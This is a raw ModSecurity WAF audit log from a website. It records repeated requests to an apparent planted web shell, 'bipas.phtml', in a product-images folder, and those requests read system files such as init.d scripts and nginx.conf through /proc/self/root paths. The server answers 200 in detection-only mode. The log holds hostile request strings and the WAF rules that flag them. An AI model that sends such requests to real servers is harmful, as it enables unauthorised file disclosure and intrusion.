+0530] aFCJwaC450Yw050Ymr0QHgAAAAk 216.73.216.71 39676 127.0.0.1 7081 --07a67558-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Finit.d&viewfile=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Finit.d%2Fapparmor HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --07a67558-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4615 Connection: close Content-Type: text/html; charset=UTF-8 --07a67558-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/2582/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/2582/etc/init.d/apparmor"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/2582/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJwaC450Yw050Ymr0QHgAAAAk"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/2582/etc/init.d/apparmor"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJwaC450Yw050Ymr0QHgAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108609602470 4437 (- - -) Stopwatch2: 1750108609602470 4437; combined=2205, p1=367, p2=1683, p3=38, p4=31, p5=85, sr=96, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --07a67558-Z-- --9161485f-A-- [17/Jun/2025:02:47:38.989144 +0530] aFCJ8hwcFb_n1P0IC9x_kAAAAAo 216.73.216.71 51582 127.0.0.1 7081 --9161485f-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d%2Fuuidd HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --9161485f-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3596 Connection: close Content-Type: text/html; charset=UTF-8 --9161485f-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/uuidd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJ8hwcFb_n1P0IC9x_kAAAAAo"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/uuidd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJ8hwcFb_n1P0IC9x_kAAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108658986209 2998 (- - -) Stopwatch2: 1750108658986209 2998; combined=1598, p1=263, p2=1156, p3=71, p4=28, p5=80, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9161485f-Z-- --a63c5552-A-- [17/Jun/2025:02:47:39.900049 +0530] aFCJ86EB9lmWsOo-rPOOcAAAAAU 216.73.216.71 38066 127.0.0.1 7081 --a63c5552-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d%2Fopen-iscsi HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --a63c5552-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4060 Connection: close Content-Type: text/html; charset=UTF-8 --a63c5552-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/open-iscsi"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJ86EB9lmWsOo-rPOOcAAAAAU"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/open-iscsi"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJ86EB9lmWsOo-rPOOcAAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108659895858 4244 (- - -) Stopwatch2: 1750108659895858 4244; combined=2246, p1=359, p2=1723, p3=47, p4=33, p5=84, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a63c5552-Z-- --bb6e5f36-A-- [17/Jun/2025:02:47:41.177425 +0530] aFCJ9U3CmevS3xeTzmo9awAAAAQ 216.73.216.71 38242 127.0.0.1 7081 --bb6e5f36-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d%2Fiscsid HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --bb6e5f36-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3761 Connection: close Content-Type: text/html; charset=UTF-8 --bb6e5f36-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/iscsid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJ9U3CmevS3xeTzmo9awAAAAQ"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/iscsid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJ9U3CmevS3xeTzmo9awAAAAQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108661172213 5282 (- - -) Stopwatch2: 1750108661172213 5282; combined=2799, p1=434, p2=2158, p3=47, p4=37, p5=123, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --bb6e5f36-Z-- --a5d1594c-A-- [17/Jun/2025:02:47:44.701218 +0530] aFCJ-E3CmevS3xeTzmo9bwAAAAQ 216.73.216.71 38652 127.0.0.1 7081 --a5d1594c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d%2Fapparmor HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --a5d1594c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4612 Connection: close Content-Type: text/html; charset=UTF-8 --a5d1594c-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/apparmor"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJ-E3CmevS3xeTzmo9bwAAAAQ"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/apparmor"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJ-E3CmevS3xeTzmo9bwAAAAQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108664697033 4239 (- - -) Stopwatch2: 1750108664697033 4239; combined=2218, p1=337, p2=1720, p3=38, p4=29, p5=94, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a5d1594c-Z-- --f775fe3e-A-- [17/Jun/2025:02:47:46.430343 +0530] aFCJ-ooVQnPDyHnl9oO9qgAAAAY 216.73.216.71 38860 127.0.0.1 7081 --f775fe3e-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Finit.d&viewfile=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Finit.d%2Fudev HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --f775fe3e-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 5340 Connection: close Content-Type: text/html; charset=UTF-8 --f775fe3e-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/2582/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/2582/etc/init.d/udev"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/2582/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJ-ooVQnPDyHnl9oO9qgAAAAY"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/2582/etc/init.d/udev"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJ-ooVQnPDyHnl9oO9qgAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108666425935 4479 (- - -) Stopwatch2: 1750108666425935 4479; combined=2136, p1=343, p2=1641, p3=36, p4=27, p5=89, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f775fe3e-Z-- --37ee6c4e-A-- [17/Jun/2025:02:47:49.614051 +0530] aFCJ_VJfblPUQiSn5r172AAAAAA 216.73.216.71 33218 127.0.0.1 7081 --37ee6c4e-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d%2Fgrub-common HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --37ee6c4e-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3477 Connection: close Content-Type: text/html; charset=UTF-8 --37ee6c4e-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/grub-common"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJ_VJfblPUQiSn5r172AAAAAA"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/grub-common"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJ_VJfblPUQiSn5r172AAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108669610268 3836 (- - -) Stopwatch2: 1750108669610268 3836; combined=2066, p1=340, p2=1583, p3=37, p4=28, p5=78, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --37ee6c4e-Z-- --f64f6f4d-A-- [17/Jun/2025:02:47:50.890205 +0530] aFCJ_hwcFb_n1P0IC9x_ogAAAAo 216.73.216.71 33378 127.0.0.1 7081 --f64f6f4d-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d%2Fxinetd HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --f64f6f4d-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3952 Connection: close Content-Type: text/html; charset=UTF-8 --f64f6f4d-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/xinetd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJ_hwcFb_n1P0IC9x_ogAAAAo"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/xinetd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCJ_hwcFb_n1P0IC9x_ogAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108670886336 3921 (- - -) Stopwatch2: 1750108670886336 3921; combined=2062, p1=340, p2=1568, p3=43, p4=28, p5=83, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f64f6f4d-Z-- --1707e318-A-- [17/Jun/2025:02:47:52.710092 +0530] aFCKAIoVQnPDyHnl9oO9swAAAAY 216.73.216.71 33592 127.0.0.1 7081 --1707e318-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fnginx&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fnginx%2Fnginx.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --1707e318-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3439 Connection: close Content-Type: text/html; charset=UTF-8 --1707e318-H-- Message: Warning. Matched phrase "etc/nginx/nginx.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/nginx/nginx.conf found within ARGS:viewfile: /proc/self/root/etc/nginx/nginx.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/nginx/nginx.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/nginx/nginx.conf found within ARGS:viewfile: /proc/self/root/etc/nginx/nginx.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCKAIoVQnPDyHnl9oO9swAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108672706037 4109 (- - -) Stopwatch2: 1750108672706037 4109; combined=2076, p1=346, p2=1603, p3=34, p4=37, p5=56, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1707e318-Z-- --2722c33e-A-- [17/Jun/2025:02:47:54.349803 +0530] aFCKApVkCcfT-Z8NQYyu8gAAAAc 216.73.216.71 33790 127.0.0.1 7081 --2722c33e-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d%2Fapport HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 